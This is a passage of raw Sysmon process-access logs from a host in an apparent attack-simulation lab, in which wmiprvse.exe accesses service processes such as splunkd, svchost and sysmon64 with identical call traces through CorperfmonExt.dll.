Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005780Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005779Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8552-5FCF-4100-000000009101}2804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005778Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005777Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3800-000000009101}3612C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005776Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005775Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3600-000000009101}3344C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005774Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005773Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3500-000000009101}3240C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005772Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005771Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3400-000000009101}3224C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005770Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005769Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005768Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005767Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005766Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005765Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005764Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005763Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005762Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005761Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005760Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005759Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005758Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005757Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYS